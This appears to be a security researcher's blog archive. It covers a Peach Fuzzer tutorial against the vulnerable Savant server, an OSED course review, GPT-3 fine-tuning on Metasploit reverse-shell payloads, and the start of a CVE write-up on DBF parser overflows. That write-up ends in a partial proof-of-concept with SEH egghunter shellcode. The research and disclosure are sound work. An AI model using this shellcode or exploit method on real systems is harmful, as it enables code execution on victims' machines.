        xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">

        <DataModel name="GetRequest">
            <String value="GET " mutable="false" token="true"/> 
            <String value="/"/>             
            <String value=" HTTP/1.1" mutable="false" token="true"/>
            <String value="\r\n" mutable="false" token="true"/>

            <String value="User-Agent: " mutable="false" token="true"/>
            <String value="Mozilla/5.0"/>   
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Host: ##HOST##:##PORT##" mutable="false" token="true"/>
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Accept: " mutable="false" token="true"/>
            <String value="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"/>   
            <String value="\r\n" mutable="false" token="true"/> 
            
            <String value="Accept-Language: " mutable="false" token="true"/>
            <String value="en-us"/> 
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Accept-Encoding: " mutable="false" token="true"/>
            <String value="gzip, deflate"/> 
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Referer: " mutable="false" token="true"/>
            <String value="http://##HOST##/"/>  
            <String value="\r\n" mutable="false" token="true"/>     

            <String value="Cookie: " mutable="false" token="true"/>
            <String value=""/>
                    
            <String value="Conection: " mutable="false" token="true"/>
            <String value="Keep-Alive" mutable="false" token="true"/>   
            <String value="\r\n" mutable="false" token="true"/>
            <String value="\r\n" mutable="false" token="true"/>
        </DataModel>    
        
        <DataModel name="GetResponse">
            <String value="" />
        </DataModel>

        <StateModel name="StateGet" initialState="Initial">
            <State name="Initial">
                <Action type="output">
                    <DataModel ref="GetRequest"/>
                </Action>
                <Action type="input">
                    <DataModel ref="GetResponse"/>
                </Action>
            </State>
        </StateModel>   

        <Agent name="LocalAgent">
            <Monitor class="WindowsDebugger" />
        </Agent>

        <Test name="Default">
            <StateModel ref="StateGet"/>
            <Agent ref="LocalAgent"/>
            <Publisher class="TcpClient">
                <Param name="Host" value="##HOST##"/>
                <Param name="Port" value="##PORT##"/>
            </Publisher>
            
            <Logger class="File">
                <Param name="Path" value="Logs"/>
            </Logger>
            <Strategy class="Sequential" />
        </Test> 
    </Peach>

In order to support the parameters, Peach Pits must also be accompanied by a configuration file:

    <?xml version="1.0" encoding="utf-8"?>
    <PitDefines>
        <All>
            <String key="HOST" value="127.0.0.1" name="Host" description="Server host name or IP"/>
            <String key="PORT" value="21" name="Port" description="Server port number"/>
        </All>
    </PitDefines>

Thereafter, copy the http_get.xml and http_get.xml.config into {PEACH DIRECTORY}\bin\pits\Net\http_get.xml. You can rename the folder from Net to any other category. Note: Your templates MUST be in a subfolder of pits, otherwise it will not turn up in the Peach GUI.

Next, from the Peach directory, run .\Peach.exe. This will start up the web interface on port 8888 and open it up in your browser. Lucky you!

Peach Web Interface

Peach Web Interface

Configuring a Fuzzing Session

We are nearly there! Continue by installing the vulnerable version of Savant from the Exploit Database page.

Next, go to Library where you should see your HTTP Get template listed. Click it to start a new Pit configuration. Since we are fuzzing Savant's Web Server, name the configuration Savant.

In the next screen, select Variables. From here, overwrite the parameters to match the host and port that Savant will occupy.

Configure Variables

Configure Variables

Next, you will need to add Monitors. If you are running Peach directly from the CLI, these would already be defined in your template. However, the web interface appears to require manual configuration. Let us look at the two steps to do so:

Step One: add an agent. This defaults to local, meaning the agent will run in the Peach instance itself rather than in a different host. Name it something reasonable, like LocalAgent.

Step two: add a monitor. Since we want to monitor the Savant process for crashes, we must add a Windows Debugger monitor and set the Executable parameter to the path Savant.exe.

Configure Monitors

Configure Monitors

Peach Fuzzer also comes with lots of useful monitors and automations such as a popup clicker (e.g.Β closing registration reminders) and network monitoring. For now, the Windows Debugger is all you need.

Save your monitoring configuration, then go to Test to perform a test run. This will run Savant with one test case to ensure everything goes smoothly. If all goes well, it is time to run your fuzzing session!

Successful Test

Successful Test

Running a Fuzzing Session

Go back to the main dashboard to start your session. Cross your fingers! In Savant's case, it will only be a few seconds before you hit your first fault (crash)!

Fuzzing Session

Fuzzing Session

Peach Fuzzer will automatically triage your crashes with the WinDbg's !exploitable in the Risk column (in the screenshot everything is UNKNOWN due to the missing 2012 Redistributable dependency, but it should be properly triaged if it is installed).

You can click on individual test cases to view the proper description and memory of the crash.

Fault Detail

Fault Detail

You can also download the test case that caused the crash. If we inspect the test case for Savant, we will see that Peach Fuzzer modified the GET / path to GET ///////////... The WinDBG output also suggests that EIP has been overwritten. With that, we have proven that the template can successfully discover the known request header buffer overflow vulnerability in Savant by fuzzing it. Now go forth and find another target!

Conclusion

In terms of free and open-source template-based generational fuzzers, researchers do not have many options. The biggest alternative is the Python β€œMonsters Inc.” line of fuzzers, namely Sulley, later BooFuzz, and now Fuzzowski by NCC Group. GitLab's open-source Peach Fuzzer presents a big step forward in terms of usability and sophistication, albeit limited by the lack of prebuilt templates. If you have templates from a previous purchase of Peach Fuzzer Professional, you are in luck. However, the secret sauce of these fuzzers is always the templates. Sadly, GitLab will not be open-sourcing the Pro templates and will only be offering them behind a commercial product later this year. Without a large library of templates, the usefulness of Peach Fuzzer is limited.

If you are willing to put in the work to build your own templates, I think that Peach Fuzzer is a fantastic starter kit to get you into the fuzzing game. However when it comes to more advanced fuzzing, Peach falls short. While it claims to be a β€œsmart” fuzzer, it was documented in an older era of fuzzing. It is perhaps more accurate to call it a generational or file format-aware fuzzer that fuzzes based on prewritten templates. These days, coverage-guided/feedback-driven fuzzers such as AFL and Honggfuzz may be considered more advanced approaches. Peach only uses Intel Pin to minimise corpora and does not appear to use it for actual fuzzing.

Peach, however, still has its place in any researcher's toolkit, especially if your focus is on specific file structures. I found that Peach is especially useful for prototyping potential fuzzing targets due to the quick setup and ability to fuzz black-box targets without a harness. It can still pick up surface-level vulnerabilities and help highlight potentially vulnerable targets for deeper fuzzing.

#infosec #cybersecurity #fuzzing #hacking

ROP and Roll: EXP-301 Offensive Security Exploit Developer (OSED) Review and Exam

23 June 2021 at 15:21

The Rule of Three

EXP-301 Logo by Offensive Security

The Windows User Mode Exploit Development (EXP-301) course and the accompanying Offensive Security Exploit Developer (OSED) certification is the last of the three courses to be released as part of the Offensive Security Certified Expert – Three (OSCE3) certification. Since the appointment of the new CEO Nina Wang in 2019, Offensive Security has revamped its venerable lineup of courses and certifications, culminating in the new OSCE3 announced at the end of 2020. As I’ve discussed in my Offensive Security Experienced Penetration Tester (OSEP) review, this makes a lot of sense from a marketing and sales strategy standpoint. Although Offensive Security was best known for its no-expiry certifications, it has since retired a number of them, including the old OSCE and more recently Offensive Security Wireless Attacks (OSWP). It has also introduced a number of recurring revenue subscription products such as the Offensive Security Proving Grounds, PWK365, and more. Oh, and it’s raising the price of exam retakes from $150 to $249. These are all great business decisions for Offensive Security, but for the regular cybersecurity professional, is the EXP-301/OSED worth it?

When it comes to learning exploit development, the foundations haven’t really changed since Corelan’s classic exploit writing tutorial series in 2009. You start with the basic overflows and structured exception handlers, then move on to increasingly challenging bypasses such as data execution prevention and address space layout randomisation. You learn to do return oriented programming, custom shell coding, and more intermediate topics – all in x86. That’s because even though the modern exploit development environment is incredibly different from 2009, the fundamentals have largely remained the same. However, it’s still a steep learning curve for most because you have to reconfigure your thought process around stacks and assembly code – not exactly the most intuitive concepts.

That’s why a foundational exploit development course in x86 is still relevant today and I felt that EXP-301 does this very well. You could definitely just do Corelan’s free exploit writing tutorial series, but you won’t be working on modern tools such as WinDBG and IDA. Additionally, EXP-301 provides a huge amount of material to guide you every step of the way until it finally clicks in your head. I can’t emphasize this enough – whether you are working in x86 or x64, in x64dbg or WinDBG, unless you have achieved a high level of familiarity with manipulating the stack in assembly-land, you will face endless difficulties. The labs are excellent at honing particular aspects of exploit development before the exam brings them all together in classic β€œTry Harder” fashion. EXP-301 shines when it taps on Offensive Security’s exploit heritage.

After clearing the OSEP at the end of February 2021, I took the 60-day EXP-301/OSED package from March to May 2021, and finally cleared the exam in mid-June. At the time of writing, this costs $1299. As my job role is pretty multi-disciplinary, I found it necessary to build up my exploit development skills and the OSED came at a right time. I also can’t deny that the lure of the OSCE3 β€œhalo” certification pushed me to take it – the marketing is working! While I have previously done the Corelan series and the occasional exploit development tutorial, I didn’t quite grok it. In addition, while I was more comfortable in application security and penetration testing, I felt that I lacked that extra punch in my offensive skills without binary exploitation. Here's my review along with some tips and tricks to maximise your OSED experience.

What You Should Know

Offensive Security recommends the following pre-requisites to take the Windows User Mode Exploit Development course:

  • Familiarity with debuggers (ImmunityDBG, OllyDBG)
  • Familiarity with basic exploitation concepts on 32-bit
  • Familiarity with writing Python 3 code

The following optional skills are recommended:

  • Ability to read and understand C code at a basic level
  • Ability to read and understand 32-bit Assembly code at a basic level

However, while I think these pre-requisites are sufficient for the first half the course, once you move into return-oriented programming and reverse engineering, understanding 32-bit assembly code is no longer optional. You should really build up your familiarity with assembly and reverse engineering as much as possible before taking the course. In addition, you would save a lot of time in the earlier sections by completing some of the Corelan exploit writing tutorials first – EXP-301 tracks it pretty closely.

As with all Offensive Security courses, EXP-301 teaches you everything you need to know on top of the recommended pre-requisites, but unless you have the time to thoroughly study the materials on a consistent basis, you may find it difficult to fully grasp the concepts without additional preparation.

What You Will Learn

Unlike PEN-300/OSEP, which taught a broad array of topics in penetration testing, EXP-301 sticks close to the fundamentals and goes deep. As mentioned earlier, you start with the basics of buffer overflows and SEH overwrites, but the course quickly moves on to reverse engineering with IDA, custom shell coding your egg hunters and reverse shells, ROP chaining, and finally format string attacks.

I found that EXP-301 is especially strong in three areas: reverse engineering, custom shell code, and ROP. While some might question the usefulness of teaching IDA Free when Ghidra is a thing, I’d say that the two are pretty interchangeable at this level. Furthermore, IDA Pro remains the standard for advanced users, so it’s better to get acquainted with IDA first. Interestingly, by forcing you to rely on IDA Free’s limited set of features, the course makes you better at reverse engineering in the long run. While I considered myself fairly proficient at the basics of reverse engineering, having completed two-thirds of last year’s Flare-On challenges, I still relied on bad analysis patterns and leaned hard on the pseudocode crutch. With only assembly decompilation and limited signatures in IDA Free, I could no longer do that.

ROP chaining and custom shell coding can be incredibly hard to master because it’s difficult for most people to intuitively understand these concepts. Before the course, while I knew the basic principles of ROP, I could hardly get started. EXP-301 properly explains every step of the process, working through each assembly instruction over multiple exercises until it flows naturally for you. By the middle of the course, I was comfortable enough to apply ROP to my own vulnerability research and successfully built exploits for real-world bugs that are now pending full disclosure.

However, the two format string attacks chapters were a little weak. Placed at the end of the course, they cover format string reads and writes respectively. While the concepts are taught well, I could definitely have used a bit more practice in exploiting them. Perhaps the course could have taught more attack vectors and format string variants.

Overall, each chapter builds well on the previous one, creating a solid foundation for exploit development.

What You Should Also Learn By Yourself

As an exploit development rather than a vulnerability research course, EXP-301 only covers the reverse engineering route to finding bugs. You won’t learn fuzzing or source code review which can be entire courses in themselves. You may want to learn these in order to properly conduct vulnerability research on your own. You can check out my Peach Fuzzer tutorial for a beginner’s quickstart to fuzzing – there are plenty of write-ups and tutorials out there. One big difference between EXP-301 and the Corelan tutorials is that the former only deals with network-based exploits, while some of the exploits covered by Corelan are file-based. This is another huge domain to cover.

Other than that, the obvious next steps would be the concepts covered by the Advanced Windows Exploitation course: kernel exploits, type confusion, heap spraying and more – approaching real mastery. You wouldn’t really expect these in a foundational exploit development course, but they are necessary to go far.

How I Prepared for the Exam

To prepare for the exam, I tried to complete all the exercises and extra miles, missing out only two super-hard ones (you will know what they are; the course tells you as much). I also completed all of the lab machines.

Additionally, I worked on building my automation. Epi has a fantastic OSED-scripts repo that automates various tasks in exploit development, such as categorising ROP gadgets and generating building blocks for custom shell code. However, if you use them without understanding them, it’s a recipe for disaster – focus on understanding how and why these scripts work by reading the code and stepping through various exercises with them. I contributed my own additions and edits to the repo as I practised, which helped me better understand the underlying concepts. You could do what I did and modify the repo or write your own automation, but the end goal should be solidifying your fundamentals, not taking short cuts.

Other than that, I also applied some of the course knowledge in my own vulnerability research. As mentioned earlier, these vulnerabilities are pending full disclosure but I’m pretty excited about them because they demonstrated an immediate application of the skills I learned in the course.

I also highly recommend joining the official Offensive Security Discord server. You get to chat with other students and Offensive Security staff as you work through the course, which really helps to clear up misunderstandings or clarify concepts. Big shoutout to @TheCyberBebop @epi @bonjoo @hdtran and more!

I was very apprehensive about the exam, and I was right to be. While the OSWE and OSEP exams were generally in line with what I expected based on the courses and labs, the OSED exam was a whole other beast. It was kind of like looking at everything I had been taught in the course through a funhouse mirror – same same but different. Try Harder different. At every turn, I felt like obstacles had been specifically placed in my way to make things more difficult. I advise you to read the instructions properly and manage your time well. By the end of the exam, I had completed all of the three challenges, although one of them only worked on the development machine. I realised why only when writing my report – a real facepalm moment! Let’s just say I didn’t sleep much during that 48-hour exam.

I submitted my report on Wednesday and received the exciting news that I had passed the following Tuesday afternoon. I also received a second congratulatory message that I had achieved the OSCE3.

OSCE3 Certification

Triple Threat

To answer the question, β€œIs EXP-301 worth it?” you can think about it in two ways. As a foundational exploit development course, I think it’s fantastic. It really gets you to a level of familiarity with the fundamentals such as reading assembly code and manipulating the stack that is hard to achieve with free write-ups. As part of the OSCE3, I think it is a nice testament to your all-round skill and ability to withstand suffering, but not strictly necessary. While offensive security roles tend to be fairly inter-disciplinary, it is also perfectly possible to stay within the application security or penetration testing domains without ever needing to read a line of assembly code. Only take this on if you’re sure you need the exploit development skills or if you have the resources to splash out on completing the trilogy for the sake of it.

As to what’s next, Offensive Security continues to refresh its product line under the new direction of the CEO. It recently announced that the Wireless Attacks course would be retired, possibly paving the way for a modern Internet-Of-Things course. At its current price-to-value ratio, Offensive Security sits in between the mass-market Udemy-style courses and the sky-high SANS and bespoke trainings. Personally, I’m interested to see how it’ll shake up this market in the long run.

#offensivesecurity #certification #infosec #cybersecurity

Down the Rabbit Hole: Unusual Applications of OpenAI in Cybersecurity Tooling

17 September 2021 at 13:16

Note: This is the blogpost version of a talk I gave to the National University of Singapore Greyhats club. If you prefer video, you can watch it here:

Introduction

Now that Mr. Robot and The Matrix are back on Netflix, re-watching them has been a strangely anachronistic experience. On the one hand, so much of what felt fresh and original back then now seems outdated, even cringey. After all, the past few years definitely provided no end of β€œF SOCIETY” moments, not to mention the hijacking of β€œred pill”... but the shows stand on their own with some of the most arresting opening scenes I've ever watched.

Matrix Cutscene

Mr Robot Cutscene

With AI well into the technology adoption lifecycle, most of the low-hanging fruits have been plucked – in cybersecurity, antivirus engines have integrated machine learning models on the client and in the cloud, while malicious actors abuse synthetic media generation to execute all kinds of scams and schemes. There's a ton of hype and scaremongering for sure, but still good reason to be concerned.

Matrix AI

OpenAI's next-generation GPT-3 language models gained widespread attention last year with the release of the OpenAI API, and was understandably a hot topic at Black Hat and DEF CON this year. A team from Georgetown University's Center for Security and Emerging Technology presented on applying GPT-3 to disinformation campaigns, while my team developed OpenAI-based phishing (and anti-phishing) tools that we shared at Black Hat and DEF CON. After all, the GPT-3 API presented a massive leap in power and access compared to the previous state-of-the-art; estimates by Lambda Labs show more than a hundredfold increase in parameters compared to GPT-2.

resource gpt-2 gpt-3 gpt-3 api
time 1+ weeks 355 years <1 minute
cost $43k $4.6m $0.06/1k tokens
data size 40 gb 45 tb negligible
compute 32 tpuv3s 1 tesla v100 gpu negligible
energy ? ? negligible
released 2019 2020 2020

However, most research into the malicious applications of AI tends to focus on human factors (scamming, phishing, disinformation). There has been some discussion of AI-powered malware but this remains very much in the proof-of-concept stage. This is partly a function of the kinds of models available to researchers – generative models lend themselves easily to synthetic media, while language models are easily applied to phishing and fake news. Classification problems fit antivirus solutions well. But where do we go from these low-hanging fruits?

OpenAI for Cybersecurity Tooling

Recently, OpenAI released new products that cross into code. First, GitHub developed Copilot based on GPT-3 that provided code auto-completion for programmers. Next, thanks to the data-sharing agreement with GitHub, OpenAI produced Codex, an arguably far more impressive tool that generates code based on plain language instructions.

OpenAI Codex

The shift into coding was partly inspired by early usage of the API beta that revealed that GPT-3 was actually pretty good at parsing code even without fine-tuning. For example, feeding it a prompt like this:

An engineer asked me about what this JavaScript code does:

"""
var minions = ["Bob", "Kevin", "Stuart"];
console.log(minions);
"""

I analyzed it for them, explaining what the assembly does in plain language a software engineer can understand:

Would return:

The code initializes an array with three names, then logs the array to the console. As a human, you can see that this code simply creates an array and logs it to the console.

Of course, given that the model is probabilistic, it also occasionally returned hilarious failures such as:

It creates an array of three integers, and then prints the array to the console.  I asked the engineer to explain the code to me in plain language. He struggled.  Why did it take so much work for him to explain this simple code?  I've noticed something interesting:  Years of experience with programming languages can actually make it harder to explain code.  Why does it take so much work to explain code after you've been programming for many years?  It feels like an effort to explain code using programming language features after you've learned so many of them.

OpenAI also recently released a davinci-instruct beta model that is fine-tuned to parse plain-language instructions and performed better in my own tests. Given that Codex appears to be a mix of davinci-instruct and fine-tuning on code, it would perform even better.

Reverse-Engineering Assembly

With all this in mind, I decided to put OpenAI's models through its paces. One possibility that stood out to me was applying GPT-3 to reverse-engineering assembly code. If it could explain Python or JavaScript code well, how about one layer down? After all, the best malware reverse engineers emphasize that pattern recognition is key. For example, consider the following IDA graph:

IDA graph

To the casual observer like me, it would take some time to read and understand the assembly code before concluding that it was an RC4 cipher key scheduling algorithm. In particular, this is the RC4 cipher from a Metasploit payload used in Flare-On 2020 Challenge 7 – read about my process here. Experienced reverse engineers would be able to quickly zoom into interesting constants (100h – 256 in decimal) and the overall β€œshape” of the graph to immediately reach the same conclusion.

Would it be possible to tap on a key strength of machine learning – pattern recognition – to automate this process? While classification models are used extensively by antivirus engines nowadays, would it be possible to jerry-rig the GPT-3 language model for assembly?

Right of the bat, GPT-3 by itself is terrible at interpreting assembly. Take the same RC4 example and ask GPT-3 to explain what it is:

GPT-3 vs Asssembly Example 1

GPT-3's first answer is that the assembly code prints β€œHELLO WORLD”. While this demonstrates that GPT-3 understood the prompt, the answer was way off base.

How about changing the prompt instead? This time, I asked GPT-3 to translate the assembly code to Python:

GPT-3 vs Asssembly Example 2

Still not great. It seemed like the model was not sufficiently optimized for assembly code. Fortunately, OpenAI also just released a beta fine-tuning feature that allows users to fine-tune GPT-3 (up to the Curie model) on training completions. The training file is in JSONL format and looks like this:

{"prompt": "<prompt text>", "completion": "<ideal generated text>"}
{"prompt": "<prompt text>", "completion": "<ideal generated text>"}
{"prompt": "<prompt text>", "completion": "<ideal generated text>"}

More importantly, it's free to fine-tune models up to 10 fine-tuning runs per month; data sets are limited to 2.5 million tokens (about 80-100mb). Interestingly, even though GPT-3 really started out as a completion API, OpenAI suggests that fine-tuning could be used to transform the model into classifiers, giving the example of email filters. By setting the auto-completion tokens to 1 (i.e., only return 1 word in the completion), the β€œcompletion” now functions as a classification (e.g. returning β€œspam” or β€œjunk”).

Thus began my very unscientific experiment. I generated a training corpus of 100 windows/shell/reverse_tcp_rc4 payloads with Metasploit, diassembled them with objdump, and cleaned the output with sed. For my unencrypted corpus, I used windows/shell/reverse_tcp. Since Metasploit slightly varies each payload per iteration (I also randomized the RC4 key), there was at least some difference among each sample.

Training Set

I then placed the assembly as the prompt in each training sample and set the completion value to either rc4 or unecrypted. Next step: training – openai api fine_tunes.create –t training_samples.jsonl -m curie --no_packing.

Fine Tuning

Here, I discovered one major advantage of the API – whereas fine-tuning GPT-2 takes significant time and computing power for hobbyists, fine-tuning GPT-3 via the API took about five minutes on OpenAI's powerful servers. And it's free, too! For now.

With my fine-tuned model in hand, I validated it against a tiny test set scraped from the web. I took custom RC4 assembly by different authors for my test set, such as rc4-cipher-in-assembly. For the unencrypted test set, I simply used non-encryption related assembly code.

The unscientific results (put away your pitchforks) were encouraging:

Experiment Results

RC4 was recognized 4 out of 5 times, while unecrypted 3 out of 5. Interestingly, the β€œwrong” reuslts for unencrypted test samples weren't due to miscategorizing them as rc4. Instead, the fine-tuned model simply returned unrelated tokens such as new tab characters. This was likely because my training set for unencrypted assembly was purely Metasploit shells, while the test set was more varied, including custom code to pop calculator and so on. If one were to take these results as false negatives instead of false positives, the picture looks even better. Of course, the results varied with each iteration, but they remained consistently correct.

Code Review

Since I didn't have access to the Codex beta yet, I used davinci-instruct as the next-best-option to perform code review. I fed it simple samples of vulnerable code and it performed reasonably well.

PHP Code Review

In this sample, it correctly identified the XSS vulnerability, even specifying the exact parameter that caused the vulnerability.

It's also important to note that Codex explicitly cites error-checking of code as a use case. With a bit of tweaking, it's not too much of a stretch to say that it could also perform vulnerability-checking. The only limitation here would be performance over large prompts or codebases. However, for small cases (whitebox CTFs or DOM XSS?), we might see decent results soon.

Furthermore, even though fine-tuning is limited up to the Curie model for now, if OpenAI opens up Codex or Davinci for fine-tuning, the performance gains would be incredible.

Blind Alleys

With a few simple experiments, I found that OpenAI's GPT-3 could be further fine-tuned for specific use cases by cybersecurity researchers. However, there are clear limits to GPT-3's effectiveness. As a language model at heart, it's better suited at tasks like completion and instructions, but I doubt it might be as good at cryptanalysis or fuzzing – there's no free lunch. There are better classes of ML models for different tasks – or maybe ML isn't even useful in some cases.

The flip side of using AI as a cybersecurity research tool is that those tools can also be compromised – the machine learning variant of a supply-chain attack. Data sources like GitHub can be poisoned to produce vulnerable code, or even leak secrets. I think the use of GitHub code as a training dataset, even for open-source licenses, will remain a sticking point for some.

However, it's clear to me that even if the low-hanging fruit have been plucked, there are still unusual and potentially powerful use-cases for machine learning models in cybersecurity. As access to GPT-3 grows over time, I expect interesting AI-powered security tooling to emerge. For example, IDA recently released a cloud-based Decompiler; while machine learning hasn't come into the equation, it could be an interesting experiment. How about a security hackathon, OpenAI? Let's see how far this rabbit hole goes.

All Your (d)Base Are Belong To Us, Part 1: Code Execution in Apache OpenOffice (CVE-2021-33035)

29 September 2021 at 03:35

Note: This is a mirror of the Medium blogpost.

Introduction

Venturing out into the wilderness of vulnerability research can be a daunting task. Coming from a background in primarily web and application security, I had to shift my hacking mindset towards memory corruption vulnerabilities and local attack vectors. This two-part series will share how I got started in vulnerability research by discovering and exploiting code execution zero-days in office applications used by hundreds of millions of people. I will outline my approach to getting started in vulnerability research including dumb fuzzing, coverage-guided fuzzing, reverse engineering, and source code review. I will also discuss some management aspects of vulnerability research such as CVE assignment and responsible disclosure.

In part two, I will disclose additional vulnerabilities that I discovered via coverage-guided fuzzing – including CVE-2021-38646: Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability.

Picking a Target

One piece of advice I received early in the vulnerability research journey was to focus on a file format, not a specific piece of software. There are two main advantages to this approach. Firstly, as a beginner, I lacked the experience to quickly identify unique attack vectors in individual applications, whereas file format parsing tends to be a common entrypoint among many applications. Furthermore, common file formats are well-documented by Request for Comments (RFCs) or open-source code, reducing the amount of effort required to reverse-engineer the format. Lastly, file format fuzzing tends to be much simpler to set up than protocol fuzzing. Overall, it is a good way to get started in vulnerability research.

However, not all file formats are created equal. I needed to select a file format that was not simply a ZIP file in disguise, (e.g. a DOCX file). This helped to simplify my fuzzing templates rather than dealing with nested file containers and reduced the amount of complexity when conducting root cause analysis. As far as possible, I also wanted to focus on a less-researched file format that may have escaped the notice of other researchers.

After a bit of Googling, I found the dBase database file (DBF) format (.dbf).

Created almost 40 years ago, the dBase database format was used as a data storage mechanism for a variety of applications, from spreadsheet processors to integrated development environments (IDEs). Although it continued to support more use cases with each revision, the format still suffered from significant limitations in storage and media support, eventually losing out to more advanced competitors. However, due to its status as a legacy file format across multiple platforms, dBase databases still popped up in interesting places, such as in the shapefile geographic information system (GIS) format. Many spreadsheet and office applications have continued to support DBF, including Microsoft Office, LibreOffice, and Apache OpenOffice.

Fortunately, it was relatively simple to discover the file format documentation for dBase; Wikipedia has a simple description of version 5 of the format and dBase LLC also provides an updated specification. The Library of Congress lists an amazing catalogue of file formats, including DBF. The various versions and extensions of the DBF format provide ample opportunities for programmers to introduce parsing vulnerabilities.

Dumb Fuzzing with GitLab's Peach Fuzzer

Before diving into coverage-guided fuzzing (which I will write about in part 2), I decided to validate my understanding of the file format by using a format-based dumb fuzzer to discover vulnerabilities in simple DBF processors. FileInfo.com provided a list of programs that could open DBF files. I focused on tiny applications whose sole job was to open and display DBF files rather than complex enterprise applications. This had a few advantages. Firstly, it would be much faster to fuzz with dumb fuzzers, which run the entire application rather than a minimal harness. Secondly, there was a greater likelihood that these less well-maintained applications would be vulnerable to format-based exploits. Lastly, this allowed me to isolate any crashes to the file format parsing logic itself. For my research, I fuzzed Windows applications due to the relative abundance of Windows DBF processors.

I used GitLab's open-source Peach Fuzzer – something I previously wrote about – as my dumb fuzzer. Peach Fuzzer claims to be β€œsmart” due to the way it records and analyses crashes as they occur. However, compared to modern coverage-based fuzzers that trace the execution flow with each iteration, Peach Fuzzer only instruments execution (via Intel PIN) in its corpus minimisation tool. During the actual fuzzing itself, Peach mutates test cases based on a given template, also known as β€œPits”.

Crafting the Peach Pit for the DBF format proved to be the most difficult and time-consuming stage of dumb fuzzing. The DBF format consists of two main sections: the header and the body. The header includes a prefix that describes the dBase database version, the last update timestamp, and other metadata. More importantly, it specifies the length of each record in the database, the length of the header structure, the number of records, and the data fields in a record. The fields themselves can be integers, strings, floating numbers, or any other supported data types. The fields also include a FieldLength descriptor. The body simply contains all the records as described by the header.

To describe the relationship between the number of records specified in the header and the number of actual records in the body, I used the Relation block. For example, I specified the NumberOfRecords header bytes as such:

<Number name="NumberOfRecords" size="32" signed="false">
    <Relation type="count" of="Records" />
</Number>

Later in the template, I added a <Block name="Records" minOccurs="0"> block in the body. Peach automatically detected this relation and ensured that in subsequent mutations, the number of Records blocks in the fuzzing candidate matched the NumberOfRecords byte in the header (unless the mutation is intended).

One consideration I struggled with was how strict the templates should be. For example, since Peach supports various data types such as String and Number, I could have also specified that the record data in the body should correspond to the FieldType descriptions in the header. However, this might have prevented the fuzzer from discovering interesting new crashes, such as if a String type was provided for an Integer field. Ultimately, I decided to keep this flexible with a generic <Blob name="RecordData" /> block.

With my Peach Pit complete, it was time to gather a corpus of samples to generate new fuzzing candidates. I wrote a simple Python script to scrape samples using the filetype:dbf Google dork, triaged the samples, and then minimised the corpus with Peach's own tool:.\PeachMinset.exe -s samples -m minset -t traces "<PATH TO FUZZING TARGET>" %s. This cut the corpus size down from more than 200 to about 20.

After all that work, I could finally begin fuzzing! This was as simple as Z:\peach\Peach.exe .\dbf_pit.xml. Some of the applications held up well; for others, the crashes piled up quickly.

Peach Crashes

Peach Fuzzer runs WinDBG's !exploitable script on crashes to triage them. Here, we see that Scalabium dBase Viewer suffered from a structured exception handler (SEH) overwrite crash from one of the test cases.

SEH Crash

Since SEH overwrites are one of the easiest to exploit in Windows (if there are no pesky protections in the way), Peach rightly categorised it as EXPLOITABLE. Additionally, Peach listed which fields it mutated for this test case.

The next step was to pinpoint exactly which bytes caused the SEH overwrite in the test case. I opened the test case in 010 Editor with a DBF template that highlighted which bytes corresponded to the format's specification and manually whittled away excess bytes until I had a β€œminimal viable crash” file that reproduced the same crash.

Minimal Viable Crash

On the left, you can see the original crash was 18538 bytes, while on the right the minimal viable crash file was only 102 bytes. By removing excess bytes in blocks while ensuring that the crash was still reproducible, I eventually isolated the root cause of the crash: the field with fieldType of 2!

Going back to the DBF documentation, the fieldType byte defines the data type of the corresponding field in the record, such as C for character, D for date, l for long, and so on. However, 2 was not mentioned. After further research, I came across the documentation for the FlagShip extension to the dBase database format that included a 2 data type:

fieldType Size Type Description/Storage Applies for (supported by)
2 2 short int binary int max +/– 32767 FS (.dbf type = 0x23,0x33,0xB3)
4 4 long int binary int max +/– 2147483647 FS (.dbf type = 0x23,0x33,0xB3)
8 8 double binary signed double IEEE FS (.dbf type = 0x23,0x33,0xB3)

This suggested that the overflow occurred due to an overly large buffer being copied into the short int buffer of size 2. I decided to further inspect the crash in WinDBG:

(173c.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Users\offsec\Desktop\exploits\dbfview\dbfview\dbfview.exe
eax=001979d0 ebx=41414141 ecx=00000000 edx=41414141 esi=00000000 edi=02214628
eip=0046619c esp=00197974 ebp=0019faa4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
dbfview+0x6619c:
0046619c 8b4358          mov     eax,dword ptr [ebx+58h] ds:002b:41414199=????????
0:000> !exchain
0019798c: dbfview+6650f (0046650f)
0019faac: 42424242
Invalid exception stack at 41414141
0:000> dd 0019faac-0x20
0019fa8c  00000000 41414141 41414141 41414141
0019fa9c  41414141 41414141 41414141 41414141
0019faac  41414141 42424242 0019fb40 0019fb48
0019fabc  004676e7 0019fb40 004c1c10 00000002
0019facc  02214628 00000000 02214744 00000000
0019fadc  00000000 0019fb48 004082ef 02214744
0019faec  80000000 00000003 00000000 00000003
0019fafc  00000080 00000000 4c505845 0054494f

I observed that my controlled buffer of size 36 (as specified in fieldLength in the 010 Editor template) had been copied byte for byte into the short int buffer which led to the SEH overwrite. This suggested that the application blindly trusted the attacker-controlled fieldLength when performing a copy of the bytes into a pre-allocated buffer whose size was determined by the attacker-controlled fieldType. This resulted in a straightforward buffer overflow with no special character requirements. Before proceeding with the exploitation, I performed one final check with narly for any memory protections:

0:000> !nmod
00400000 0051e000 dbfview              /SafeSEH OFF                C:\Users\offsec\Desktop\exploits\dbfview\dbfview\dbfview.exe

Great, dbfview had no protections. I proceeded to write a short script to generate my proof-of-concept payload.

from struct import pack

# SEH-based egghunter with egg w00tw00t
egghunter = b"\xeb\x2a\x59\xb8\x77\x30\x30\x74\x51\x6a\xff\x31\xdb\x64\x89\x23\x83\xe9\x04\x83\xc3\x04\x64\x89\x0b\x6a\x02\x59\x89\xdf\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xd1\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x31\xc0\xc3"                       

# dbase header
payload = b'\x03'                       # dbase version number
payload += b'\x01\x01\x01'              # last update date
